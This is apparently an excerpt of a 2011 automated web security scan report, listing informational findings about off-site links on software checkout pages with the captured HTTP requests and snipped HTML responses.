GET /assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Chuff_promo.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Capp-feeds.js%2Chptwitter.js%2Csitemode.js&v44499 HTTP/1.1
Host: s.huffpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=2592000
Date: Sat, 26 Mar 2011 20:36:02 GMT
Content-Length: 632001
Connection: close

/* From: app1-nyc : 7779 */
(function(root){root.huff=({init:function(){this.jquery=jQuery.noConflict();this.events={};this.modules={};this.versions={};this.loading={};this.styles={};var t=this;window
...[SNIP]...
</a>';});},twittify:function(tweet_text){var at=function(t){return t.replace(/(^|[^\w]+)\@([a-zA-Z0-9_]{1,15})/g,function(m,m1,m2){return m1+'<a href="http://twitter.com/'+m2+'" target="_blank" class="twitter-anywhere-user">'+'@'+m2+'</a>';});};var hash=function(t){return t.replace(/(^|[^\w'"]+)\#([a-zA-Z0-9_]+)/g,function(m,m1,m2){return m1+'#<a href="http://search.twitter.com/search?q=%23'+m2+'" target="_blank">'+m2+'</a>
...[SNIP]...
</div>';return ad;};QV.ad_button=function(){ad='<iframe id="ad_button" src="http://ad.doubleclick.net/adi/huffingtonpost/homepage/quickread;tile=6;sz=88x31;ord='+ord+'?" width="88" height="31" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe>
...[SNIP]...
20.80. https://secure.avangate.com/order/cart.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/cart.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /order/cart.php?PRODS=1523013&QTY=1 HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Referer: http://www.fast-report.com/bitrix/redirect3.php?GOTO=https%3A%2F%2Fsecure.avangate.com%2Forder%2Fcart.php%3FPRODS%3D1523013%26QTY%3D1%26GID%3DBITRIX_SM.NzAwMjg4MC40NjE5NjY3Lk4wLi4uZW4%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sat, 26 Mar 2011 17:12:07 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 29819


<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <script type="text/javascript" language="JavaScript">
       if (window != top) {
           top.location.href = location.href;

...[SNIP]...
</title>
   
       
                                                                                                       <link rel="stylesheet" type="text/css" href="https://3619-avangate.voxcdn.com/content/static/css/order/f828415f1f46680d5e5c922acda80c6b/20101223091901.css?20101223091906">

<style type="text/css">
...[SNIP]...
<div class="general_top_nojs_alert"><img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014" alt="" class="sprite sprite-warning-ico-16px" /> For the shopping cart to work properly you'll need to <strong>
...[SNIP]...
<td align="center"><img src="https://3619-avangate.voxcdn.com/content/images/avangate.gif?20060515133745" width="760" height="73"></td>
...[SNIP]...
<td><img src='https://3619-avangate.voxcdn.com/content/images/verifiedbyvisa-t.gif?20070111175046'>&nbsp;<img src='https://3619-avangate.voxcdn.com/content/images/mastercardsecurecode-t.gif?20070111175045'></td>
...[SNIP]...
<!-- START SCANALERT CODE -->
<a target="_blank"
href="https://www.scanalert.com/RatingVerify?ref=secure.avangate.com"><img
width="115" height="32" border="0"
src="//images.scanalert.com/meter/secure.avangate.com/12.gif"
alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime."
oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;"></a>
...[SNIP]...
<div id="order__secure__seal">
                           <a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=SECURE.AVANGATE.COM&lang=en" onClick="window.open(this.href,'verysignwin', 'toolbar=no,location=no,directories=no,status=yes,menubar=no,scrollbars=no,resizable=no,width=550,height=566');return false;">
           <span id="verisign-logo"><img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014" border="0" class="sprite" /></span>
...[SNIP]...
<!-- TEST -->
<script type="text/javascript" language="javascript" src="https://3619-avangate.voxcdn.com/content/static/js/order/73f82f37d8558c1a5d62879d208944bf/20110218151117.js?20110218151127"></script>
...[SNIP]...
<a href="http://www.omniture.com" title="Web Analytics"><img
src="https://102.122.2O7.net/b/ss/gecadavangate/1/H.20.3--NS/0"
height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
20.81. https://secure.avangate.com/order/checkout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/checkout.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /order/checkout.php?CART_ID=28d9066c6ec8a32ef621f59af8052e03 HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Referer: https://secure.avangate.com/order/cart.php?PRODS=1523013&QTY=1
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=dteebjh09n3gl94ubf15q229d7jcnclm; GKD=%95%DB%CE%9F%A1%CF%AEt%9D%B9%8E%C9%B1%C2%9C%9A%91%AB%85q%A2%CB%B4%E4%A0%BC%91%AA%91%83%96%CE%B0%D5%B3%CF%90%88%9A%A9%96%B5%AC%A8

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sat, 26 Mar 2011 17:12:24 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 82609


<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <script type="text/javascript" language="JavaScript">
       if (window != top) {
           top.location.href = location.href;

...[SNIP]...
</title>
   
       
                                                                                                       <link rel="stylesheet" type="text/css" href="https://3619-avangate.voxcdn.com/content/static/css/order/f828415f1f46680d5e5c922acda80c6b/20101223091901.css?20101223091906">

<style type="text/css">
...[SNIP]...
<div class="general_top_nojs_alert"><img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014" alt="" class="sprite sprite-warning-ico-16px" /> For the shopping cart to work properly you'll need to <strong>
...[SNIP]...
<td align="center"><img src="https://3619-avangate.voxcdn.com/content/images/avangate.gif?20060515133745" width="760" height="73"></td>
...[SNIP]...
<td><img src='https://3619-avangate.voxcdn.com/content/images/verifiedbyvisa-t.gif?20070111175046'>&nbsp;<img src='https://3619-avangate.voxcdn.com/content/images/mastercardsecurecode-t.gif?20070111175045'></td>
...[SNIP]...
<!-- START SCANALERT CODE -->
<a target="_blank"
href="https://www.scanalert.com/RatingVerify?ref=secure.avangate.com"><img
width="115" height="32" border="0"
src="//images.scanalert.com/meter/secure.avangate.com/12.gif"
alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime."
oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;"></a>
...[SNIP]...
<div class="order__payment__methods" id="order__payment__methods">
                                                                                                                       <img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014"
                                                                   
                                                                       onclick="
                                                                           document.getElementById('payment').selectedIndex = 0;
                                                                           FillSelectbox('billing_currency',document.getElementById('payment').options[0].value);
                                                                           showMessage(document.getElementById('payment'));
                                                                           ShowAdditionalSection(document.getElementById('payment').options[0].value);
                                                                       "
                                                                   
                                                                   
                                                                   title="Visa/MasterCard/Eurocard"
                                                                   id="pay_opt_1"
                                                                   class="sprite order__payment__option__button"
                                                               ><img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014"
                                                                   
                                                                       onclick="
                                                                           document.getElementById('payment').selectedIndex = 1;
                                                                           FillSelectbox('billing_currency',document.getElementById('payment').options[1].value);
                                                                           showMessage(document.getElementById('payment'));
                                                                           ShowAdditionalSection(document.getElementById('payment').options[1].value);
                                                                       "
                                                                   
                                                                   
                                                                   title="American Express"
                                                                   id="pay_opt_4"
                                                                   class="sprite order__payment__option__button"
                                                               ><img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014"
                                                                   
                                                                       onclick="
                                                                           document.getElementById('payment').selectedIndex = 2;
                                                                           FillSelectbox('billing_currency',document.getElementById('payment').options[2].value);
                                                                           showMessage(document.getElementById('payment'));
                                                                           ShowAdditionalSection(document.getElementById('payment').options[2].value);
                                                                       "
                                                                   
                                                                   
                                                                   title="Discover/Novus"
                                                                   id="pay_opt_14"
                                                                   class="sprite order__payment__option__button"
                                                               ><img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014"
                                                                   
                                                                       onclick="
                                                                           document.getElementById('payment').selectedIndex = 3;
                                                                           FillSelectbox('billing_currency',document.getElementById('payment').options[3].value);
                                                                           showMessage(document.getElementById('payment'));
                                                                           ShowAdditionalSection(document.getElementById('payment').options[3].value);
                                                                       "
                                                                   
                                                                   
                                                                   title="Bank/Wire transfer"
                                                                   id="pay_opt_2"
                                                                   class="sprite order__payment__option__button"
                                                               ><img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014"
                                                                   
                                                                       onclick="
                                                                           document.getElementById('payment').selectedIndex = 4;
                                                                           FillSelectbox('billing_currency',document.getElementById('payment').options[4].value);
                                                                           showMessage(document.getElementById('payment'));
                                                                           ShowAdditionalSection(document.getElementById('payment').options[4].value);
                                                                       "
                                                                   
                                                                   
                                                                   title="Diners Club"
                                                                   id="pay_opt_5"
                                                                   class="sprite order__payment__option__button"
                                                               ><img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014"
                                                                   
                                                                       onclick="
                                                                           document.getElementById('payment').selectedIndex = 5;
                                                                           FillSelectbox('billing_currency',document.getElementById('payment').options[5].value);
                                                                           showMessage(document.getElementById('payment'));
                                                                           ShowAdditionalSection(document.getElementById('payment').options[5].value);
                                                                       "
                                                                   
                                                                   
                                                                   title="JCB"
                                                                   id="pay_opt_6"
                                                                   class="sprite order__payment__option__button"
                                                               ><img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014"
                                                                   
                                                                       onclick="
                                                                           document.getElementById('payment').selectedIndex = 6;
                                                                           FillSelectbox('billing_currency',document.getElementById('payment').options[6].value);
                                                                           showMessage(document.getElementById('payment'));
                                                                           ShowAdditionalSection(document.getElementById('payment').options[6].value);
                                                                       "
                                                                   
                                                                   
                                                                   title="PayPal"
                                                                   id="pay_opt_8"
                                                                   class="sprite order__payment__option__button"
                                                               ><img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014"
                                                                   
                                                                       onclick="
                                                                           document.getElementById('payment').selectedIndex = 7;
                                                                           FillSelectbox('billing_currency',document.getElementById('payment').options[7].value);
                                                                           showMessage(document.getElementById('payment'));
                                                                           ShowAdditionalSection(document.getElementById('payment').options[7].value);
                                                                       "
                                                                   
                                                                   
                                                                   title="Fax"
                                                                   id="pay_opt_9"
                                                                   class="sprite order__payment__option__button"
                                                               >                                                        </div>
...[SNIP]...
<td width="48"><img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014" class="sprite sprite-warning-ico" alt=""></td>
...[SNIP]...
<td width="48"><img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014" class="sprite sprite-warning-ico" alt=""></td>
...[SNIP]...
<div id="order__secure__seal">
                           <a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=SECURE.AVANGATE.COM&lang=en" onClick="window.open(this.href,'verysignwin', 'toolbar=no,location=no,directories=no,status=yes,menubar=no,scrollbars=no,resizable=no,width=550,height=566');return false;">
           <span id="verisign-logo"><img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014" border="0" class="sprite" /></span>
...[SNIP]...
<!-- TEST -->
<script type="text/javascript" language="javascript" src="https://3619-avangate.voxcdn.com/content/static/js/order/73f82f37d8558c1a5d62879d208944bf/20110218151117.js?20110218151127"></script>
...[SNIP]...
<a href="http://www.omniture.com" title="Web Analytics"><img
src="https://102.122.2O7.net/b/ss/gecadavangate/1/H.20.3--NS/0"
height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
20.82. https://secure.shareit.com/shareit/checkout.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.shareit.com
Path:   /shareit/checkout.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

POST /shareit/checkout.html?sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406&prno=1 HTTP/1.1
Host: secure.shareit.com
Connection: keep-alive
Referer: https://secure.shareit.com/shareit/checkout.html?PRODUCT[300261966]=1&HADD[300261966][ADDITIONAL1]=BITRIX_SM.NzAwMjg4MC40NjE5NjY3Lk4wLi4uZW4%3D&hidecoupon=1
Content-Length: 371
Cache-Control: max-age=0
Origin: https://secure.shareit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-dc5-e5-moonlight-sol-01=1023542538.20480.0000

DELIVERY%5B0%5D=EML&WPRODUCTS%5B0%5D=1&MPRODUCT_ID=&RE_USERNAME=&RE_PASSWORD=&REG_NAME_RADIO=NAME&COMPANY=&SALUTATION=&FIRSTNAME=&LASTNAME=&D_STREET1=&D_STREET2=&D_CITY=&D_STATE_ID=&D_POSTALCODE=&D_CO
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 17:12:26 GMT
Server: Apache
P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI"
Keep-Alive: timeout=5, max=5000
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 69671

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Fast Reports Inc. - Buy</title>
<style type="text/css">
<!--
/*Hauptelemente*/
body
{
font-family :
...[SNIP]...
ENT="With ShareIt! shareware and software developers can sell their products worldwide on the Internet, shareware and software buyers can browse the comprehensive catalog of more than 5000 titles.">


<script src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/e5_main.js" type="javascript"></script>
...[SNIP]...
<td width="231"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/pimages/15446/logo.gif" alt="Professional reporting tools - Fast Report" border="0" height="59" width="231"></td>
...[SNIP]...
<td valign="top" width="2%" class="e5"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<a href="help.html?helpid=[DASID_10449]&sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406" target="ONLINE_HELP_10449"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/logo_checkout_verifiedbyvis.gif" border="0" alt="Verified by Visa" title="Verified by Visa"></a>
...[SNIP]...
<a href="help.html?helpid=[DASID_10448]&sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406" target="ONLINE_HELP_10448"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/logo_checkout_mastercardsec.gif" border="0" alt="Mastercard SecureCode" title="Mastercard SecureCode"></a>
...[SNIP]...
<td colspan="3" class="e5_cartborder_horizontal e5_cartborder_horizontal_1"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" height="1" border="0" alt=""></td>
...[SNIP]...
<td class="e5_cartborder_vertical" width="1"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td class="e5_cartborder_vertical e5_cartborder_vertical_headrow" width="1"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="5" border="0" alt=""></td>
...[SNIP]...
<td class="e5_cartborder_vertical e5_cartborder_vertical_headrow" width="1"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="5" border="0" alt=""></td>
...[SNIP]...
<td class="e5_cartborder_vertical e5_cartborder_vertical_headrow" width="1"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="5" border="0" alt=""></td>
...[SNIP]...
<td class="e5_cartborder_vertical" width="1"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="5" border="0" alt=""></td>
...[SNIP]...
<td class="e5_cartborder_vertical e5_cartborder_vertical_headrow" width="1"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="5" border="0" alt=""></td>
...[SNIP]...
<td class="e5_cartborder_horizontal e5_cartrowcolor2" colspan="11"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="5" height="1" border="0" alt=""></td>
...[SNIP]...
<td colspan="11" class="e5_rowcolor1 e5_cartrowcolor2 e5_crt_vertical_item_space"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="10" border="0" alt="" class="e5_crt_vertical_item_space"></td>
...[SNIP]...
<td class="e5_cartborder_horizontal e5_cartrowcolor2" colspan="11"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="5" height="1" border="0" alt=""></td>
...[SNIP]...
<td class="e5_cartborder_vertical e5_cartrowcolor2"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="5" border="0" alt=""></td>
...[SNIP]...
<td class="e5_cartborder_vertical e5_cartrowcolor2"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="5" border="0" alt=""></td>
...[SNIP]...
<td class="e5_cartborder_vertical e5_cartrowcolor2"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="5" border="0" alt=""></td>
...[SNIP]...
<td class="e5_cartborder_vertical e5_cartrowcolor2"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="5" border="0" alt=""></td>
...[SNIP]...
<td width="1" class="e5_cartborder_vertical e5_cartrowcolor2"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="5" border="0" alt=""></td>
...[SNIP]...
<td colspan="11" class="e5_cartborder_horizontal e5_cart_updatebutton_space"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="5" height="1" border="0" alt=""></td>
...[SNIP]...
<td colspan="11" class="e5_cartborder_horizontal e5_cartborder_horizontal_mid"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="5" height="1" border="0" alt=""></td>
...[SNIP]...
<td align="right" width="100%" id="e5_msc_crt_css_dart"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/css_dart.gif" border="0" alt="Total amount" title="Total amount"></td>
...[SNIP]...
<td class="e5_cartborder_vertical" width="1"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td colspan="3" class="e5_cartborder_horizontal"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="100%"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="8" border="0" alt=""></td>
...[SNIP]...
<td colspan="3" width="100%" class="e5_outerborder_horizontal"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="1" border="0" alt=""></td>
</tr>
<tr>
<td class="e5_outerborder_vertical" width="1"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td valign="top"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="1" border="0"></td>
...[SNIP]...
<td class="e5_outerborder_vertical" width="1"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="1" border="0" alt=""></td>
</tr>
<tr>
<td colspan="3" class="e5_outerborder_horizontal"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="100%"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="4" border="0" alt=""></td>
...[SNIP]...
<td width="100%"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="9" border="0" alt=""></td>
...[SNIP]...
<td colspan="3" class="e5_outerborder_horizontal"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td class="e5_outerborder_vertical" width="1"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td valign="top" class="e5_content" id="e5_lbl_cho_licenseto"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="200" height="1" border="0" alt=""><br>
...[SNIP]...
<td valign="top" nowrap class="e5_content" id="e5_lbl_cho_company"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="200" height="1" border="0" alt=""><br>
...[SNIP]...
<td valign="top" class="e5_content" id="e5_lbl_cho_salutation"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="200" height="1" border="0" alt=""><br>
...[SNIP]...
<td valign="top" class="e5_content" id="e5_lbl_cho_firstname"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="200" height="1" border="0" alt=""><br>
...[SNIP]...
<td valign="top" class="e5_content" id="e5_lbl_cho_lastname"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="200" height="1" border="0" alt=""><br>
...[SNIP]...
<td valign="top" class="e5_content" id="e5_lbl_cho_address"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="200" height="1" border="0" alt=""><br>
...[SNIP]...
<td valign="top" class="e5_content" id="e5_lbl_cho_address-add"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="200" height="1" border="0" alt=""><br>
...[SNIP]...
<td valign="top" class="e5_content" id="e5_lbl_cho_city"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="200" height="1" border="0" alt=""><br>
...[SNIP]...
<td valign="top" class="e5_content" id="e5_lbl_cho_state"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="200" height="1" border="0" alt=""><br>
...[SNIP]...
<td valign="top" class="e5_content" id="e5_lbl_cho_zip"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="200" height="1" border="0" alt=""><br>
...[SNIP]...
<td valign="top" class="e5_content" id="e5_lbl_cho_country"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="200" height="1" border="0" alt=""><br>
...[SNIP]...
<td valign="top" nowrap class="e5_content" id="e5_lbl_cho_vat"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="200" height="1" border="0" alt=""><br>
...[SNIP]...
<td valign="top" class="e5_content" id="e5_lbl_cho_phone"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="200" height="1" border="0" alt=""><br>
...[SNIP]...
<td valign="top" class="e5_content" id="e5_lbl_cho_fax"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="200" height="1" border="0" alt=""><br>
...[SNIP]...
<td valign="top" class="e5_content" id="e5_lbl_cho_email"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="200" height="1" border="0" alt=""><br>
...[SNIP]...
<td valign="top" class="e5_content" id="e5_lbl_cho_email_con"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="200" height="1" border="0" alt=""><br>
...[SNIP]...
<td class="e5_outerborder_vertical" width="1"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="1" border="0" alt=""></td>
</tr>
<tr>
<td colspan="3" class="e5_outerborder_horizontal"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<td colspan="3" class="e5_outerborder_horizontal"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="1" border="0" alt=""></td>
</tr>
<tr>
<td class="e5_outerborder_vertical" width="1"><img src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/p_t.gif" width="1" height="1" border="0" alt=""></td>
...[SNIP]...
<div class="e5_payment_icons_div">
<img id="e5_payment_icons_visa" src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/icon_cc_V.gif" width="30" height="18" border="0" alt="">
<img id="e5_payment_icons_master" src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/icon_cc_M.gif" width="30" height="18" border="0" alt="">
<img id="e5_payment_icons_amex" src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/icon_cc_A.gif" width="30" height="18" border="0" alt="">
<img id="e5_payment_icons_diners" src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/icon_cc_D.gif" width="30" height="18" border="0" alt="">
<img id="e5_payment_icons_jcb" src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/icon_cc_J.gif" width="30" height="18" border="0" alt="">
<img id="e5_payment_icons_paypal" src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/icon_paypal.gif" width="41" height="18" border="0" alt="">
<img id="e5_payment_icons_giro" src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/icon_giropay.gif" width="41" height="18" border="0" alt="">
<img id="e5_payment_icons_discover" src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/icon_cc_C.gif" width="30" height="18" border="0" alt="">
<img id="e5_payment_icons_s" src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/icon_cc_S.gif" width="30" height="18" border="0" alt="">
</div>
...[SNIP]...
